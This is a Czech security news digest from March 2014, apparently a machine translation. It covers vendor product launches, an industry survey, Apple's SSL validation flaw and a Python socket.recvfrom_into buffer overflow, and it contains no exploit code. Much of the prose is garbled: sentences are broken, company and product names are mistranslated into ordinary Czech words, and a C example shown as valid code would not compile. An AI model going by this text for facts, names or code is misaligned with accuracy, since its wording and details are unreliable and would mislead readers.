Systém CryptoCube se skládá z přizpůsobené, vícefaktorové autentizace zabezpečená rack skříně obsahující kombinaci řešení Futurex Tvrzené Enterprise Security Platform na míru speciálně pro potřeby každé organizace používat. na technologii Futurex v Tvrzené Enterprise Security Platform základě CryptoCube domy FIPS 140-2 Level 3 ověřena Secure kryptografických prostředků v rámci jednoho prostoru. Přístup k systému je řízena dotykovým displejem na přední straně CryptoCube, s ověřování podařilo pomocí pověření na základě hesla, čipové karty, a biometrické údaje. bezpečnostní aplikace Enterprise CryptoCube:
Hardware Security Module služby
Enterprise Key a osvědčení o řízení
Šifrování dat, dešifrování, validace a ověřování
Bezpečné Attached Storage
SSL / TLS Link Encryption
Public Key Infrastructure
Elektronická faktura Podepisování a ověřování
Jádro kryptografických zálohování infrastruktury
CryptoCube nabízí širokou škálu funkcí pro snadné použití, bezpečnost, správu a monitoring:
Kompletní Přizpůsobení: CryptoCube může obsahovat zcela vlastní mix řešení Futurex Tvrzené Enterprise Security Platform a je k dispozici ve třech různých velikostech rackových (12U, 24U, a 44u). Před prováděním, Futurex je řešení Architekti pomáhat v rozvoji úplného plánu nasazení, s přihlédnutím k požadované funkce a budoucí požadavky na škálovatelnost.
Kontrola při vstupu: CryptoCube je vybaven duální, elektromagnetické blokovacího mechanismu, čtečky čipových karet, a biometrickou čtečkou pro robustní, Multifaktorová autentizace. Zápis Uživatel probíhá pomocí integrovaného LCD displeje, a veškerá citlivá data budou zpracována pomocí FIPS 140-2 Level 3-ověřené Secure kryptografického prostředku.
Integrovaný LCD displej: Všechna zařízení Futurex v rámci CryptoCube lze monitorovat a přistupovat k nim pomocí snadno použitelné dotykové obrazovky LCD. Od zápisu uživatelů k ověřování k monitorování výkonu, provoz CryptoCube je navržen tak, aby bylo co nejjednodušší a snadno-to-použití, jak je to možné.
Výkon a monitorování životního prostředí: senzory na ochranu životního prostředí aktivně sledovat, aby zajistila optimální funkčnost. Navíc, metriky výkonu, včetně využití CPU, využití paměti a zpracování transakcí propustnost pro všechna zařízení obsažených v CryptoCube jsou k dispozici přímo na ověřeným uživatelům prostřednictvím displeje na předním panelu.
Modulární, na klíč Architektura technologie Futurex využívá modulární architekturu v celé své platformy, umožňující nasazení na klíč a přizpůsobení pro každou část jádra kryptografické infrastruktury organizace. Tato platforma je lepší škálovatelnost umožňuje organizacím zvyšovat kapacitu s velmi malým úsilím. CryptoCube Kompaktní rozměry zajišťuje cenná data center využití prostoru je omezena na minimum.
"CryptoCube je jediným řešením svého druhu na trhu," řekl Brett Smith, prezident a generální ředitel společnosti Futurex. "Díky této technologii mohou podniky rychle vytvořit robustní základní kryptografické infrastruktury klíč způsobem s plnou redundancí, zcela odstraní typické překážky bránící realizaci."


Většina manažerů zabezpečení pod tlakem dodat aplikace rychleji
3.3.2014 Bezpečnost
Na konferenci RSA , Tufin oznámila výsledky průzkumu 169 odborníků na bezpečnost v současném stavu bezpečnostních operací. Vedená u Cisco Live! v Miláně, Itálie v lednu 2014 více než 90% respondentů uvedlo, že příroda na vyžádání virtualizace a cloudu se zvýšil tlak na ně poskytovat aplikace a služby rychleji.

S více než tři čtvrtiny respondentů si myslí virtualizace bude mít největší dopad na zabezpečení operací v průběhu následujících 12-18 měsících se tempo jen urychlí, což podtrhuje potřebu zvýšené automatizace. Tyto výsledky průzkumu doplňují zjištění většího října 2013 Tufin -pověřil průzkum, ve kterém 71% z více než 500 vedoucích IT profesionály ocitli museli přijmout nové postupy, učit se nové technologie a pracovat s novými lidmi, protože stejných trendů. Cisco technologií Live! Účastník odpovědi poukázal na další problémy jsou způsobené intenzivním tempem změn, zvýraznění několik příležitostí ke zlepšení bezpečnostní operace:

Téměř 90% se domnívá, že organizace se příliš spoléhají na bezpečnostní produkty a nástroje, sítě na úkor dobré síťové architektury a designu, aby bylo dosaženo optimální úrovně bezpečnosti sítě.
Téměř 40% respondentů uvedlo, že největší překážkou pro efektivní zabezpečení sítě je složitost sítě, zatímco 25% uvedlo nedostatek spolupráce a dalších 20% uvedlo neustálé změny vyskytující se v dnešních sítích jako jejich největší překážky.
S tímto je případ, to přijde jako žádné překvapení, že asi 89% respondentů uvedlo, že je třeba opravit po tom, mezi 20-60% změny bezpečnostní politiky v jejich organizaci.
Další jedna šestina oznámil, že je třeba je revidovat po tom, stejně jako až 60-80% z politických změn jejich organizací bezpečnosti.
"Stejně jako předchozí průzkumy potvrdily, role bezpečnosti v rámci operací se rozšiřuje s cílem vypořádat se s výzvami zabezpečení sítě, které přinesla cloud a virtualizaci," řekl Ruvi Kitov, Tufin CEO. "To vede k větší a hlubší spolupráci s dalšími skupinami v oblasti IT s cílem integrovat a automatizovat zabezpečení do oblastí, jako je návrh sítě, změny procesů a provozní výkonnost." Respondenti také to důrazně najevo, že hrozba krajina sama o sobě se mění stejně rychle jako firemní sítě. Když žádal, aby jmenovali tři vývoj, který bude s největší významně ovlivnit bezpečnost provozu v průběhu následujících 12-18 měsíců pokročilé hrozby jsou číslo jedna odpověď, hrany před virtualizace (číslo dvě) a přechodu Mission Critical podnikových aplikací do cloudu ( číslo tři). Průzkum však ukázal, že bezpečnostní operace týmy rostou na tuto výzvu. Více než tři čtvrtiny věřil jejich sítě byly jistější (55%), nebo jen jako bezpečný (22%), než tomu bylo před pěti lety. Když se zeptal, jaké jsou jejich největší automatizace problémy byly, jedna třetina citoval přesnost politických změn, jedna čtvrtina hlásil nedostatek konzistentních procesů napříč odděleními, a jedna pětina citoval nedostatek kontroly. To podtrhuje potřebu organizace realizovat řešení, která mohou modelují své sítě tak, aby pre-definované procesy a politiky mohou být uplatněna s cílem zajistit přesné automatizace změny a lepší kontrolu nad změnami zabezpečení sítě.


Samsung a Microsoft společně zabezpečí Android

3.3.2014 Mobil
Dohoda mezi oběma společnostmi se zaměří za spolupráci mezi bezpečnostní platformou Knox 2 a serverem Windows Server 2012 R2 ve snaze usnadnit vstup vlastních zařízení zaměstnanců do korporací.

Společnost Samsung minulý týden ohlásila, že její bezpečnostní aplikační kontejner Knox bude první implementaci na systému Android, která bude plně podporovat „Workplace Join“ (připojení na pracovišti) do Active Directory – ověřovací metodu pro zařízení BOYD v nové verzi serveru Windows Server 2012 R2, který společnost Microsoft uvolnila v minulém roce spolu s novou službou registrující zařízení do služby Active Directory Federation Service.

S funkcí „Workplace Join“ získali správci sítí možnost zpřístupnit Active Directory zařízením s OS Android, která nemají plná práva pro připojení do domény. Dosavadní verze serveru ovšem umožňuje řídit přístupová práva pouze pro zařízení s operačními systémy Windows 8.1 a iOS. Překvapivě se tak k i intranetovým umístěním a aplikacím nedostanou zařízení se systémem Windows Phone (což je z produktů Samsung například Ativ S).

Podle prohlášení Samsungu bude funkce „Workplace Join“ podporovat nejnovější modely mobilů a tabletů a postupně bude podpora rozšířena na všechna zařízení kompatibilní s technologií Knox. V tomto okamžiku bude tím prvním pravděpodobně právě uvedený Galaxy S5. Knox bude také podporovat Windows Intune, systém pro správu mobilních zařízeních firmy Microsoft zaměřený především na segment SME, k tomu je ale potřeba, aby byla do platformy Knox implementována potřebná rozhraní.

Firmy Samsung a Microsoft budou také spolupracovat na vývoji cloudového tisku, který by umožnil zařízením Samsung tisknout dokumenty prostřednictvím služeb cloudu Azure a serverů SharePoint.

Samsung od října 2013 prodal přes 25 milionů aplikací zavádějících ochranu Knox, kterou aktivně využívá přes milionů uživatelů. Jeho nová verze 2.0 bude s novými zařízeními distribuována od druhého čtvrtletí tohoto roku, současní uživatelé verze 1.0 ovšem budou muset nejdříve svá zařízení upgradovat na Android verze 4.4 (KitKat).


Buffer overflow v "Typ bezpečí" jazyk?
3.3.2014 Počítačový útok

Zadejte Bezpečné jazyky a přetečení zásobníku

Tam jsou ty z nás, které si většina z vývoje našeho softwaru do "Typ bezpečných" jazyků jako je Python, Ruby a. NET. Někdy jsme smuggly dívat se dolů na jazyky, jako je C, C + + a shromáždění, které nejsou typově bezpečné a neposkytují ochranu paměti. Víte, typ bezpečné programovací jazyky jsou "imunní" na otravné problémy, jako např. nárazníkové-offerflows.

Umožňuje porovnat zdrojový kód jednoduchého C a Python program, který přiřadí a vytisknout řetězec. Za prvé je zde Python zdrojový kód. >>> mystring = "Toto je můj řetězec" >>> print MyString Toto je můj řetězec můžete vidět, že v Pythonu nemusíte deklarovat typ proměnné. Nemusíte se určit, jak velká je vaše řetězec bude. Vše, co udělat, je přiřadit řetězec do proměnné a jazyk Python se postará o zbytek za vás. Nyní se podívejme na C verze tohoto kódu. char MyString [20]; mystring = "Toto je můj řetězec"; printf ("% s", mystring), S C první řádek říká kompilátoru, že "MyString" proměnná bude mít 20 znaků. Další řádek přiřadí proměnné MyString hodnotu "Toto je můj řetězec". Programátor je zodpovědný za definování jak co proměnnou bude ukládat a co velikost proměnné v paměti bude. Pokud programátor udělá chybu a pouze přidělí 20 bajtů paměti se pak pokusí uložit 30 bajtů stav vyrovnávací paměti přetečení. Od základní jazyk Python se postará o všechny správy paměti a variabilní psaní pro vás, to je "imunní" na tyto typy problémů. Tak typu použití typově bezpečné jazyky a všechno bude v pořádku. Je to tak?
 

Minulý týden zneužít byl vyslán, aby pastebin.com, že zneužil podmínku přetečení vyrovnávací paměti ve funkci Pythons socket.recvfrom_into (). Tato funkce byla zavedena v Pythonu 2.5 a je stále zranitelná v Pythonu 3. Každý program Python tam, že používá tuto funkci je totiž potenciálně zranitelný vůči vzdálenému vykořisťování. A využívat je pro tento vulnerabilty ditributed ve volné přírodě. Ale jak je to možné? Je to typ bezpečné jazyk! Všechny typ bezpečné jazyky se nabídnout nějakou ochranu proti paměťových manipluation útoky, ale nakonec se všechny tyto jazyky volat na nativních knihovnách. Takže zatímco vývojáři softwaru v typově bezpečné jazyky jsou obvykle méně pravděpodobné, že k rozvoji kód náchylnější k přetečení vyrovnávací paměti to využít slouží jako silný připomínka, než všechny jazyky jsou zneužíváni. Bezpečnostní pracovník se vždy spolehnout na obranu do hloubky. chyba byla oprava na nejnovější verzi 3.3.4 Python interpret. Aktualizujte svůj tlumočníka brzy. Verions 2.7 tlumočníci jsou trochu složitější. Lastest interpret je 2.7.6 a neobsahuje patch pro vydání # 20246. Oprava je k dispozici na webových stránkách, ale není kompilován do k nejnovější verzi ještě. V tomto případě prevence není možné, takže detekce a sledování je nezbytné. Dávejte pozor na webových stránkách Pythonu a dívat se na nejnovější aktualizace. Existuje několik šancí zaregistrujte se SANS Python programovacím kurzu. Připojte se mi Python pro penetraci testerů v Reston VA březnu 17-21 nebo SANSFire v Baltimore června 23-27.
 

Python chyba report: http://bugs.python.org/issue20246

http://www.sans.org/event/northern-virginia-2014/course/python-for-pen-testers
http://www.sans.org/event/sansfire-2014/course/python-for-pen-testers


Ochrana API, mobilních aplikací a cloudových služeb
2.3.2014 Mobil
CA Technologies oznámila nové a aktualizované řešení založené na identitě, aby pomohly zabezpečit rostoucí počet cloud, webových a mobilních aplikací provozovaných v dnešním otevřeném podniku. Oni také oznámila nové řešení mobility a API zaměřené na urychlení vývoje mobilní aplikace, zlepšení výkonu aplikací a poskytování bezpečnosti a uživatelský komfort z klienta na backend.

Správa identit a přístupu CA řešení (IAM) pomáhají zajistit správné uživatelé a zařízení mají právo přístupu k pravé údaje, zda je uživatel developer stavět nejnovější cloud mashup nebo mobilní aplikace, je zákazník, který přistupuje jeho nebo její mobilní bankovní aplikace nebo zaměstnanec přístup k firemní cloud služby. Chcete-li pomoci organizacím při plnění potřeb zabezpečení pro širokou škálu mobilních aplikací, ať už na zakázku, dodavatelem poskytnuta nebo přístupné přes webový prohlížeč-CA Technologies nabízí jednotný Web a API zabezpečení a správy řešení . To pomáhá urychlit proces vývoje pro softwarové inženýry a optimalizovat app výkon při maximálním zatížení. Další bezpečnostní nové aplikace a pokročilé autentizační řešení pomáhají zabezpečit aplikaci jednou nasazen. CA Vrstva 7 API portál umožňuje jednoduché vytvořit značkový on-line rozhraní pro vývojáře, takže mohou přistupovat ke všem konstrukce časové zdroje potřebné k rychle objevit a pochopit API, a pak vytvořit aplikaci a sledovat jeho použití. Navrženo pro podporu partnera, třetí-party a vnitřní vývojáři napříč různými skupinami současně, toto řešení poskytuje každá jednotka vlastní sadu přístupu a publikování API výsad - to vše z jediného portálu. Nejnovější verze portálu API poskytuje důležité funkce pro urychlení aplikace vývoj s bezpečností očekávané podnikání a zákazníků, včetně:

Objev API, interaktivní dokumentace a průzkum.
Zlepšení a zjednodušení seskupení API a moderní obal, který umožňuje vývojářům přidat nové funkce do aplikace jedním kliknutím.
Integrace s CA vrstvy 7 Mobile Access GatewayTM snadno přidat zabezpečení aplikace.
CA Vrstva 7 Mobile Access Gateway zjednodušuje proces přizpůsobení interních dat, aplikací a zabezpečení infrastruktury pro mobilní použití. Poskytuje centralizovaný způsob, jak udržet a kontrolovat zabezpečení a řízení politiky informačních aktiv vystavených přes API, ale zároveň přináší konzistentní úroveň výkonu pro aplikace koncového uživatele. To byl první API brána poskytovat out-of-the development kit bezpečnostní schránka software (SDK) pro urychlení začlenění tokenu manipulaci a jednotné přihlášení do mobilních aplikací pro bezpečnou autorizaci uživatelů, aplikací a zařízení. Nová funkce pro Mobil Access Gateway zahrnuje:

Integrace CA SiteMinder session cookies a Mobile SDK rozšířit pověření SiteMinder SSO s rodilými mobilních aplikací.
Sociální přihlášení do podnikových mobilních aplikací, které poskytují pohodlí pro uživatele při zachování bezpečnosti a správy věcí veřejných.
Podpora pro cross-platformní rámci mobilní rozvoje Adobe PhoneGap.
Jakmile mobilní aplikace je nasazen a provoz, je zapotřebí další úroveň zabezpečení, aby pomohla zajistit správné uživatelsky zaměstnávat správné zařízení ve správný čas od správné místo, má přístup k schválených žádostí.
CA Mobile Application Management (CA MAM) je nový, organicky vyvinula řešení pro podnik BYOD. CA MAM využívá inovativní technologie CA Smart Kontejnerizační dynamicky ovládat mobilní přístupové politiky aplikace v granulované úrovni při zachování nativní app zkušenosti specifické pro zařízení nebo platformu. Funkce, jako je geo-oplocení, časové oplocení, sítě-oplocení a zvýšenou autentizaci definovat a prosazovat podrobné přístupové politiky týkající se geografických, denní doby a sítí, dále zvýšení bezpečnosti podnikových mobilních aplikací. Aktuální verze CA Advanced ověřování doplňuje řešení, dnes oznámila, tím, že poskytuje řadu silných pověření ověřování a nástrojů pro hodnocení rizik založených na mobilním prostředí. Funkce v CA Advanced ověřování, které tvoří bezpečnostní pohodlné a bezproblémové pro uživatele patří:

SDK, který vloží silnou autentizaci do mobilní aplikace. S možností využití PKI nebo jednoho časového hesla (OTP) software pověření, bezpečnost a uživatelský komfort je výrazně jednodušší a lepší.
PKI pověření k zajištění bezproblémové uživatelské zkušenosti. Uživatel jednoduše přihlásí se svým obvyklým heslem a zákulisí silné ověřování probíhá.
OTP, které mohou být generovány CA Technologies zdarma mobilní aplikace, nebo to může být dodán ve formě textové zprávy, hlasové zprávy nebo e-mailu.
Kromě identit a řízení přístupu řešení CA Technologies také oznámila, že CA cloud pro mobilitu. Několik ohlášených IAM řešení jsou zahrnuty v této nabídky, což umožňuje end-to-end mobilní bezpečnost a správu od vývoje přes běhu a ze zařízení až po datová centra.


Další generace anti-DDoS spotřebiče od Huawei
2.3.2014 Bezpečnost
Huawei oznámila spuštění své nové generace anti-DDoS řešení na konferenci RSA 2014 . Huawei AntiDDoS8000 Series nabízí špičkové bezpečnostní funkce, včetně výkonu a ochrany z aplikační vrstvy, mobilní zařízení a odchozí 1Tbps Distributed Denial of Service (DDoS) útoky .

To může bránit z několika stovek gigabitů za sekundu DDoS hrozeb tím, že zaměstná funkcí, jako je učení podpisu, analýzy chování, reputace mechanismus a velké datové analýzy. Huawei AntiDDoS8000 zařízení může podporovat nové servisní kartu s výkonem ochranného 160Gbps a vysokou hustotou linky Karta s deseti 10GE ​​portů. V důsledku toho může největší model zařízení podporují více než výkon 960Gbps. Určeno pro dopravce, datových center, velkých podniků a velkých poskytovatelů internetových obchodu, AntiDDoS8000 zařízení zvyšuje ochranu proti aplikační vrstvě útoky a útoky na protokol IPv6 IPv4 kompozit . sítí Vybrané funkce patří:

Detekce a zmírňování 100 + DDoS útoky včetně DDoS aplikační vrstvě (HTTP / HTTPS / DNS / SIP, atd.)
Přesné mobilní DDoS útoku mechanismus detekce a nulová falešná pozitivita na mobilní provoz při ochraně mobilního internetu služby
Prevence odchozích DDoS od datového centra s denní aktualizací botnety knihovny 5 milionů aktivních botnet IP adres.
"DDoS útoky se staly mnohem pestřejší. Dnes jsme svědky nárůstu útoků aplikace založené stejně jako útoky zahájené přímo z mobilních zařízení," řekl Liu Shaowei, Huawei Networking Business Unit generální ředitel. "Tyto nové plemena pokročilých útoků je těžké odhalit s tradičními průtoku na bázi anti-DDOS řešení, ale je možné zjistit pomocí Huawei nové AntiDDoS8000 zařízení." Nový AntiDDoS8000 je nyní k dispozici. Servisní karty 160Gbps bude k dispozici ve 4. čtvrtletí roku 2014.


Finanční instituce se musí podívat se za hranice svých vlastních obranných obvodů
2.3.2014 Bezpečnost
Lookingglass Cyber ​​Solutions dnes zveřejnila výsledky nedávné studie provedené na globálních finančních institucí a rizik zavedené svými důvěryhodnými partnery a poskytovateli, a bylo zjištěno, že 100% z třetích stran sítích vzorku prokázalo, že buď známky kompromisu nebo zvýšené riziko.

Tato studie ukazuje, že třetí strany sítě rozšířit útoku a zavést rizika, která jdou často přehlíženy. Je to poučení, že společnosti jako cíl se učí tvrdě: Původně věřil být zasvěcených, poslední Target porušení bylo ve skutečnosti výsledkem třetí strany kompromisu. Bez správné nástroje na místě, organizace, prostě nemůže sledovat nebo ověřit tyto události včas. Analýza ilustruje nebezpečí ignorovat riziko třetích stran:

Odchozí botnet provoz a škodlivého chování byly nejčastější ukazatele, což představuje 75% z hodnoceného vzorku třetí-party sady.
25% z hodnoceného vzorku sady třetích stran odhalily specifické ukazatele týkající se Zeus bankovnictví Trojan.
Cílený přístup a obecnější malware byl také převládající v rámci těchto sítí.
Přítomnost počítačů přes 25% třetích stran se snaží komunikovat s několika Conficker závrtů.
Lookingglass také našli souvislost mezi sníženým výkonem a skutečnost, že 15% ze všech třetích stran, spoléhal na jeden upstream poskytovatele připojení k Internetu, protože 25% z těchto společností byly oběti DNS nájezdy. Dále, analýzy navrhl, že třetí strany zkoumané spolehnout na dalších třetích stran, poskytovat hosting a další služby, zvýšení celkové riziko v rámci dodavatelského řetězce primárního souboru zákazníka. Provedení zběžný 6. posouzení stupně inteligence některých z těchto poskytovatelů odhalila několik sítě sousedních hostitelů s vysokou týkají ukazatelů kompromisu, který by mohl potenciálně zvýšit objem prostředek třetí strany jako útok vektoru do primární sadě zákazníka. Například, pokud je populární webhostingu používá podnikání je ohrožena, to by zase umožní útočníkům injekci škodlivé reklamy nic netušícím zákazníkům. "Tato studie poukazuje na slabost, že průmysl byl velmi váhají mluvit na veřejnosti - skutečnost že důvěryhodné třetí strany by neměly a nemohou být skutečně věřit, "řekl Chris Coleman, generální ředitel společnosti LookingGlass." Globální organizace, jako jsou finanční instituce, jakož i maloobchodníky a organizace kritické infrastruktury, je třeba podívat se za hranice svých vlastních obranných obvodů a zvážit monitorování jejich veřejné .. Internet přítomnost lépe pochopit jejich útoku získává vhled do třetími stranami je zásadní pro snižování rizika v rámci dodavatelského řetězce " Provést analýzu, Lookingglass evaluated platebních procesorů, auditory a dalších finančních služeb v rámci finančního sektoru dodavatelského řetězce přes 35 - den rozpětí ve 4. čtvrtletí roku 2013. Lookingglass analyzovat veřejný prostor adres subjektů a sledovány pro veškeré ukazatele kompromisu a rizika vyplývající z jejich veřejně mapované IP a domény prostoru. Indikátory kompromisu a rizika byly shromážděny z mnoha globálních senzorů pro sběr a zpravodajských zdrojů.


Správa šifrování platformu pro ochranu v hybridních mraky
2.3.2014 Šifrování
Výše Solutions oznámila přidání CloudLink SecureVM a CloudLink SecureFile moduly na šifrování platformě CloudLink. Sčítání navazovat na stávající CloudLink SecureVSA a poskytnout výše zákazníkům flexibilitu k šifrování vrstvy na více místech v cloud computingu zásobníku s úložným prostorem, virtuální stroj soubor a řešení na úrovni aplikace nasazena a řízena ze společného rámce.

CloudLink poskytuje šifrování nadaci, která chrání důležitá data v celé řadě případů užití z jedné integrované platformy. CloudLink integrace s předními průmyslovými hypervisor a cloudových platforem umožňuje IT osobní efektivně nasadit bezpečnostní kontroly na všech úrovních infrastruktury. Čistý dopad je lepší regulace, nižší celkové náklady na vlastnictví a zlepšit obchodní agility zabezpečit citlivá data a objetí oblak s důvěrou. přidání dvou nových šifrovacích CloudLink modulů poskytuje zákazníkům větší flexibilitu nasazení tím, že nabízí více granulární bezpečnostní kontroly pro širší rozsah použití pouzdra na zajištění hostované pracovní plochy / DAAS a podnikových aplikací. CloudLink SecureVM řeší kritickou potřebu chránit integritu objem zavazadlového prostoru jak pro aplikační server a VDI obrázků strojů ve virtualizovaných a cloudových prostředích veřejných tím, že poskytuje bezpečnou autentizaci pre-boot a šifrování svazků. CloudLink SecureFile umožňuje jemnozrnné politiku zaměřit šifrování citlivých aplikací, jako jsou Microsoft SQL Server, SharePoint, Exchange a aplikací sady Office s unikátními šablon aplikací, které zjednodušují nasazení zabezpečení. Úroveň šifrování SecureFile soubor je také speciálně navrženy tak, aby podporovaly vysoce škálovatelné souborové servery poskytující rozlišovací potřebné k zachování své pokročilé možnosti správy souborů. Jako citlivější pracovní zátěž přesunout do cloudu, poskytovatelé služeb, jako například práva duševního vlastnictví International, která je předním poskytovatelem IaaS, zotavení po havárii a ochrany dat, je využití CloudLink nabízet šifrování jako služba (EaaS) jako služby s přidanou hodnotou na vrcholu svých výpočetních a úložných nabídky. "nám CloudLink poskytuje na správu šifrování platformu, která nám umožňuje poskytovat EaaS zajistit široký Řada iniciativ zákazníka, včetně hostovaných virtuálních desktopů, aplikací a databázových serverů a virtualizované úložiště, "řekl Bryan Dürr, ředitel práv duševního vlastnictví v architektury produktu. "Snadné zákazník provisioning a pokročilé možnosti zabezpečení, které kladou klíčové kontroly v rukou našich zákazníků nám umožňují nabízet prvotřídní bezpečnostní službu, která napomůže důvěru zákazníků a přijetí cloudu."


Síťové forenzní platforma pro 10 Gig světě
2.3.2014 Bezpečnost
nPulse Technologies oznámila spuštění svého Cyclone sítě Forenzní platformy, která navazuje na plnou zachycování paketů přidáním pokročilé, těžba line-míra zásadní bezpečnostní aplikační vrstva metadat a flexibilní velký analytický rámec zabezpečení dat na indexu, hledání, analyzovat a vizualizovat síť dopravy a urychleně rekonstruovat kybernetický útok kill řetězy.

Díky automatizaci ucelený cyklus kroků, které zajistí, že veškerý síťový provoz je zachycen a kontrolovány pro forenzní a zásahů incidentu, Cyclone poskytuje viditelnost nutnou dopravní porazit útoky a snížit průměrný čas na řešení pro pokročilé síťové hrozby. Klíčovými součástmi Cyclone sítě nPulse je Forenzní Platforma zahrnuje:

Zachycení: Cyclone využívá nPulse zachycení sondy eXtreme (CPX) spotřebiče, aby vykonával trvalé, bezztrátovou plné zachycení paketů na páteřní síti rychlostí až 20 Gbps. Prostřednictvím své indexu multi-level, CPX lze hledání zaznamenán provoz na 160 násobek své rychlosti snímání - to znamená, že v době kratší než jedna minuta CPX lze vyhledávat a zobrazovat provozní údaje, které konkurenční produkty může trvat až jeden den získat. CPX zároveň exportuje standardní záznamy toků ve formátu IPFIX na nSpector, nPulse v konzole pro správu.
Metadata Extraction: nová bezpečnostní Probe eXtreme (SPX) zařízení nPulse je kontroluje síťový provoz na rychlosti linky a výtažky vrstvě OSI 7 metadata o provozu, jako jsou použité aplikace, e-mailové adresy, typy souborů a záznamů DNS. SPX bez problémů vyváží tato data ve standardním formátu IPFIX na nSpector.
Big Data Security Analytics: Na konzole indexy řízení nSpector metadat z SPX a CPX, umožňující centralizované vyhledávání v rámci celého podniku pro provoz zájmu, analýzy provozu, a vlastní řídicí panely. Postavený využívat Otevřít zásobníku soukromý cloud platformy, ale také podporuje hrozba zpravodajských kanálů třetích stran, což správcům schopnost analyzovat historické přenosy pomocí konkrétních ukazatelů kompromisu, který může pomoci odhalit kyber útok v pokroku a odvrácení budoucích útoků.
"Boj proti kybernetickým hrozbám moderní skryté rychlejší, rozmanitější síť dopravní nároky téměř v reálném čase forenzní viditelnosti a analýzy na základní rychlosti sítě - možnosti, které úřadující technologie datovat se od '1 koncert světě" prostě nenabízejí, "řekl nPulse CEO Tim Sullivan . "S uvedením nPulse v cyklonu Network Forenzní platformy, zákazníci bránící dnešní nejrychlejší sítě může získat téměř v reálném čase nahlédnout do oblastí, kde se počítají sekund - včetně, která útoku, jsou nejčastěji využívány proti jejich organizaci, nebo které z jejich sítě obrany jsou vynechány malware navigaci "kill řetěz" mezi zaútočit a úspěšného kompromisu. " "Během posledních deseti let, útočníci se přesunuli hlouběji do paketu," dodal Sullivan. "Jako síť obrana, kontroly a detekční techniky se zlepšily, útočníci museli" pohybovat nahoru OSI zásobník ", aby se zabránilo odhalení a udržovat vytrvalost. Přesun do zásobníku umožňuje útočníkům ke změně, kdy jejich škodlivý kód komunikuje jednoduše a v co nejkratší době. Toto nové paradigma vyžaduje Vrstva 7 údaje pro detekci vniknutí a urychleně rekonstruovat zabití řetězy. Jak útočníci pohybovat nahoru zásobník, jdeme s nimi. Vrstva 7 obohacené meta-dat ve spojení s naší schopnosti poskytovat plné zachycení paketů umožňuje uživatelům Cyclone solidní základ, na kterém provádět síťové forenzní nezbytné pro detekci a reakci na zásahy ve včas, při řízení celkové riziko a odvrácení budoucích incidentů. "


Apple opravuje kritickou šifrovací chybu v iOS, OS X fix být propuštěn "brzy"
2.3.2014 Zranitelnosti
V pátek Apple oznámil propuštění aktualizaci softwaru pro svůj mobilní operační systém iOS, který řeší kritické šifrování chybu. Podobný aktualizace také byl propuštěn pro Apple TV.

Zdá se, že tam bylo pár chybějící validace kroků, které z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS - ve skutečnosti, se připojit man-in- -Middle útok. iPhone a iPad uživatelům se doporučuje provést aktualizaci na verzi 7.0.6 nebo 6.16 z OS co nejdříve, a uživatelé OS X jsou vyzýváni, aby se zabránilo používání veřejné sítě, dokud stejná oprava je propuštěn pro OS. Podle různých zdrojů, prohlížeč Apple Safari a výchozí Mail.app jsou jak zranitelné, ale Firefox a Chrome nejsou ovlivněny, takže uživatelé systému Mac může dočasně přepínat s pomocí těch. Apple slíbil uvolnit OS X opravu "brzy". Vědci, kteří mají Testované starší verze obou iOS a OS X k závěru, že chyba byla přítomna měsíců. bezpečnostní výzkumník Google Adam Langley je vysvětleno , jak se vada funguje a kde chyba se stalo ve zdrojovém kódu. jednoduchosti chyby a skutečnost, že by mohla umožnit někdo - a zejména zpravodajské agentury - to využít pro špehování uživatelů vedla ke spekulaci, že je to existence mohla být úmyslné. Druhou možností je, že Apple má špatnou proces kód recenze na svém místě. Problém také lidé kritizují Apple preference pro proprietární uzavřený zdroj. Tvrdili, že takový do očí bijící chyba by mohla být spatřen před věky, pokud více výzkumníků bezpečnosti měl možnost přezkoumat kód.


Fortinet upgrady a rozšiřuje své Next-Generation Firewall
2.3.2014 Bezpečnost
Na konferenci RSA v San Franciscu, Fortinet oznámila aktualizaci operačního systému zabezpečení sítě FortiOS společnosti, spolu s novými verzemi pro integrované podávání zpráv, APT a silnou autentizaci. FortiOS 5 je operační systém základem pro FortiGate platformu a nabízí širokou škálu schopností světové úrovně bezpečnosti a možnosti konfigurace. FortiOS 5 se dodává:

Výrazně rychlejší SSL kontrola
Bohatší zpráv s ještě větší out-of-the-box zpráv a vrtat se schopností z FortiAnalyzer
Těsnější integrace s FortiAuthenticator a FortiSandbox pro bezproblémovou silné autentizace a pokročilé ochrany před hrozbami.
"Vůdci Bezpečnostní musí řešit hrozby z rostoucího provozu SSL," napsal Jeremy D'hoinne a Adam hils, výzkum ředitele společnosti Gartner. Jdou psát, "méně než 20% organizací s bránou firewall, je systém prevence narušení (IPS) nebo jednotné správy hrozeb (UTM) zařízení dešifrovat příchozí nebo odchozí datový tok protokolu SSL. Gartner se domnívá, že v roce 2017, více než polovina síťových útoků zaměřených na podniky budou používat šifrovaný provoz na kontroly bypass, se od méně než 5% dnes. " Společnost vydala FortiAnalyzer 5 aktualizaci a oznámila, že nadcházející FortiAnalyzer-3500E. Vylepšení softwaru zahrnují širší výběr předdefinovaných zpráv a větších schopností drilldown pro lepší viditelnost v chování sítě a těsnější integraci s FortiGate platformy společnosti. Kromě toho bude nový FortiAnalyzer-3500E nabízí 24 TB (rozšiřitelná až na 48 TB), skladování, aby byly splněny požadavky velkoobjemových podniků. Společnost také oznámila, že podnikové třídy FortiAuthenticator-1000D, která poskytuje několik metod ověřování, včetně hardwaru , software, e-mailu a SMS žetony, které pomáhají podnikům přejít na silnější, uživatelsky bázi modelu ověřování ve stále BYOD světě. Nový přístroj podporuje až 10.000 uživatelů a hladce integruje s FortiGate zařízení. Fortinet oznámil nový FortiSandbox-1000D. Jeho unikátní dual-level pískoviště spolu s aktivní pre-filtrace, dynamické hrozeb inteligence a bohaté vykazování jsou účinné při odhalování vysoce cílené útoky. A její konsolidovaný přístup zahrnující všechny protokoly a funkce v jednom přístroji spolu s jeho schopnost nasadit samostatně nebo jako integrovaný rozšíření FortiGate a FortiMail zařízení, snížit náklady a složitost. Konečně, nový FortiSandbox-1000D (a dříve vydané FortiSandbox -3000D) nyní spustit softwarovou verzi 1.2, který se vyznačuje lepší přístrojové vybavení, aby lépe vypořádat s rostoucím virtuálním stroji (VM) úniky techniky, aktualizovaný odhad motorů pro zvýšení sazeb detekce a novou detekci zpětného volání identifikovat odchozí komunikace a to jak na pískovišti a na drát. se FortiOS 5/FortiAnalyzer 5 aktualizace jsou nyní k dispozici. FortiAnalyzer-3500E se očekává, že ve druhém čtvrtletí tohoto roku. FortiAuthenticator-1000D je nyní k dispozici. 